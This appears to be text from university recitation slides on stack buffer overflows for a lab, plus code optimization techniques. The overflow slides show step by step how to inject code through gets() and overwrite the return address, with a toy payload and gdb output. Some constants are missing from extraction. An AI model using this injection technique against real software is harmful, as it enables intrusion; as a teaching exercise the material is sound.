Recitation 4 Outline Buffer overflow –Practical skills for Lab 3 Code optimization –Strength reduction –Common sub-expression –Loop unrolling Reminders Lab 3: due Thursday Exam1: next Tuesday Minglong Shao Office hours: Thursdays 5-6PM Wean Hall 1315
Buffer overflow: example1 void example1() { volatile int n; char buf[4]; volatile int x; n = 0x ; x = 0xdeadbeef; strcpy(buf, “abcdefg"); // ‘a’ = 0x61, ‘b’ = 0x62 buf[4] = 0xab; buf[-4] = 0xcd; } 1.n = ? x = ? 2.n = ? x = ? 3.n = ? x = ?
void example1() { volatile int n; char buf[4]; volatile int x; n = 0x ; x = 0xdeadbeef; strcpy(buf, “abcdefg"); // ‘a’ = 0x61, ‘b’ = 0x62 buf[4] = 0xab; buf[-4] = 0xcd; } Buffer overflow: example1 example1: push %ebp mov %esp,%ebp sub $0x18,%esp movl $0x ,0xfffffffc(%ebp) movl $0xdeadbeef,0xfffffff4(%ebp) sub $0x8,%esp push $0x lea 0xfffffff8(%ebp),%eax push %eax call 0x add $0x10,%esp movb $0xab,0xfffffffc(%ebp) movb $0xcd,0xfffffff4(%ebp) leave ret n is stored at %ebp-4 x is stored at %ebp-12 buf is stored at %ebp-8 Old %ebp Return addr n 0xfc 0xf8 0xf4 %ebp buf x
Breakpoint 1: before calling strcpy Old %ebp %ebp Return addr … %esp beefdead Stack frame of example1 Address high low 1.n = 0x x = 0xdeadbeef n buf x void example1() { volatile int n; char buf[4]; volatile int x; n = 0x ; x = 0xdeadbeef; strcpy(buf, “abcdefg"); // ‘a’ = 0x61, ‘b’ = 0x62 buf[4] = 0xab; buf[-4] = 0xcd; } 0xfc 0xf8 0xf4 0xe8
Breakpoint 2: after calling strcpy Old %ebp %ebp Return addr … %esp 0xfc 0xf8 0xf4 0xf0 66650067 62616463 beefdead Stack frame of example1 n buf x 2. n = 0x00676665 x = 0xdeadbeef void example1() { volatile int n; char buf[4]; volatile int x; n = 0x ; x = 0xdeadbeef; strcpy(buf, "abcdefg"); // ‘a’ = 0x61, ‘b’ = 0x62 buf[4] = 0xab; buf[-4] = 0xcd; } Address high low
Breakpoint 3: before return Old %ebp %ebp Return addr … %esp 0xfc 0xf8 0xf4 0xf0 66ab0067 becddead Stack frame of example1 n buf x 3.n = 0x006766ab x = 0xdeadbecd void example1() { volatile int n; char buf[4]; volatile int x; n = 0x ; x = 0xdeadbeef; strcpy(buf, “abcdefg"); // ‘a’ = 0x61, ‘b’ = 0x62 buf[4] = 0xab; buf[-4] = 0xcd; } Address high low
Old ebp Return addr Old ebp Write more characters … What if we instead strcpy(buf, "abcdefghijk"); 11+1 chars What if we instead strcpy(buf, "abcdefghijklmno"); 15+1 chars Old ebp is overwritten Return addr is overwritten Return addr … beefdead … n buf x beefdead old ebp ret addr n buf x old ebp ret addr
Put code onto stack: example2 push %ebp mov %esp,%ebp sub $0x24,%esp lea 0xffffffe8(%ebp),%eax push %eax call 0x mov $0x0,%eax leave ret int example2 () { char buf[16]; gets (buf); return 0; } Old %ebp Return addr 0xfc 0xf8 0xf4 %ebp buf 0xf0 0xec 0xe8 Old %ebp Return addr … 0xfc 0xf8 0xf4 … … … My code 0xf0 0xec 0xe8 %ebp
Steps 1.Write assembly code 2.Get binary representation of the code 3.Generate ASCII for the binary code 4.Generate string according to ASCII code 5.Run the program with the input
Write assembly code Use your favorite text editor For example, my exploit code is movl $0, -8(%ebp) addl $0x12345678, %eax Save as *.s, e.g. input.s
Generate input string # generate binary code: input.o unix> gcc -c input.s # generate ASCII representation for the code unix> objdump -d input.o : 0: c7 45 f8 00 00 00 00 movl $0x0,0xfffffff8(%ebp) 7: 05 78 56 34 12 add $0x12345678,%eax # put the ASCII code in a text file unix> cat > input.txt c7 45 f8 00 00 00 00 05 78 56 34 12 # generate characters according to the ASCII file unix> sendstring -f input.txt > input.raw # check whether it’s correct with “od” command unix> od -t x1 input.raw c7 45 f8 00 00 00 00 05 78 56 34 12 0a
Run the program with the input unix> gdb example2 (gdb) break example2 (gdb) run < input.raw (gdb) x/16b $ebp-24 0xbffff860: 0xb8 0x87 0x16 0x40 0xc0 0x81 0x16 0x40 0xbffff868: 0x78 0xf8 0xff 0xbf 0x41 0x82 0x04 0x08 (gdb) nexti 3 # go to the inst. after “call gets” (gdb) x/16b $ebp-24 0xbffff860: 0xc7 0x45 0xf8 0x00 0x00 0x00 0x00 0x05 0xbffff868: 0x78 0x56 0x34 0x12 0x00 0x82 0x04 0x08 (gdb) disas 0xbffff860 0xbffff86c Dump of assembler code from 0xbffff860 to 0xbffff86c: 0xbffff860 movl $0x0,0xfffffff8(%ebp) 0xbffff867 add $0x12345678,%eax
f860bfff Buffer overflow: execute your code Execute your code: how? Overwrite return address w/ starting address of your code –Pad more chars to input string –Set last 4 bytes to the addr. Strings: c7 45 f8 00 00 00 00 05 78 56 34 12 xx xx xx xx xx xx xx xx xx xx xx xx 60 f8 ff bf –Need more code for a successful attack Old %ebp Return addr 0xfc 0xf8 0xf4 0xf0 0xec 0xe8 %ebp ab e00fd79 dfe6891c c700f … … %esp 0xdc 0xbffff860 movl $0, -8(%ebp) addl $0x12345678, %eax movl $o_ebp, %ebp push $ret_addr ret
Assembly code example if (g_val >= 0) return g_val << 2; else return -g_val << 2; movl 0xg_val_addr,%eax testl %eax,%eax jge .L1 negl %eax .L1: sall $2,%eax ret
Security lessons learned Never trust the input you receive: use bounds-checking on all buffers –In particular, never ever use gets. Even the man page says so! gcc also warns you
Code optimization: strength reduction Turn complex operations into cheap ones. –Expensive operations: multiplication, division, modulus –Cheap operations: addition, bit operations, shifting
Strength Reduction int sum = 0; for (int i=0; i<size; i++) { sum += array[i]*2; } int sum = 0; for (int i=0; i<size; i++) { sum += array[i] << 1; } Before:... imull $2, %eax... sall $1, %eax cycles per iteration 8.7 cycles per iteration After:
Common sub-expression #define COLS (4) void transpose(int **m, int a, int b) { int i, j, t; for(i = 0; i < COLS; ++i) { for(j = 0; j < i; ++j) { t = m[i][j]; m[i][j] = m[j][i]*a*b; m[j][i] = t*a*b; } } } #define COLS (4) void transpose_opt(int **m, int a, int b) { int i, j, t, c = a*b; for(i = 0; i < COLS; ++i) { for(j = 0; j < i; ++j) { t = m[i][j]; m[i][j] = m[j][i]*c; m[j][i] = t*c; } } } Before: After:
Loop Unrolling Reduces the loop overhead of computing the loop index and testing the loop condition Perform more data operations in each iteration Make sure to change the loop condition to not run over array bounds Take care of the final few elements one at a time
Loop Unrolling: Bubble Sort int a[7] = {5, 7, 1, 3, 8, 2, 9}; int tmp; for(i=0; i < n-1; i++) { for(j=0; j < n-1-i; j++) { if(a[j+1] < a[j]) { tmp = a[j]; a[j] = a[j+1]; a[j+1] = tmp; } } }
Loop Unrolling: Bubble Sort int a[7] = {5, 7, 1, 3, 8, 2, 9}; int tmp; for(i=0; i < n-1; i++) { for(j=0; j < n-3-i; j+=3) { // Unroll three times if( a[j+1] < a[j] ) { tmp = a[j]; a[j] = a[j+1]; a[j+1] = tmp; }; if( a[j+2] < a[j+1]) { tmp = a[j+1]; a[j+1] = a[j+2]; a[j+2] = tmp; }; if( a[j+3] < a[j+2]) { tmp = a[j+2]; a[j+2] = a[j+3]; a[j+3] = tmp; }; } // Finish up the remaining elements for(; j< n-1-i; j++){ if( a[j+1] < a[j] ){ tmp = a[j]; a[j] = a[j+1]; a[j+1] = tmp; }; } }
Running time comparison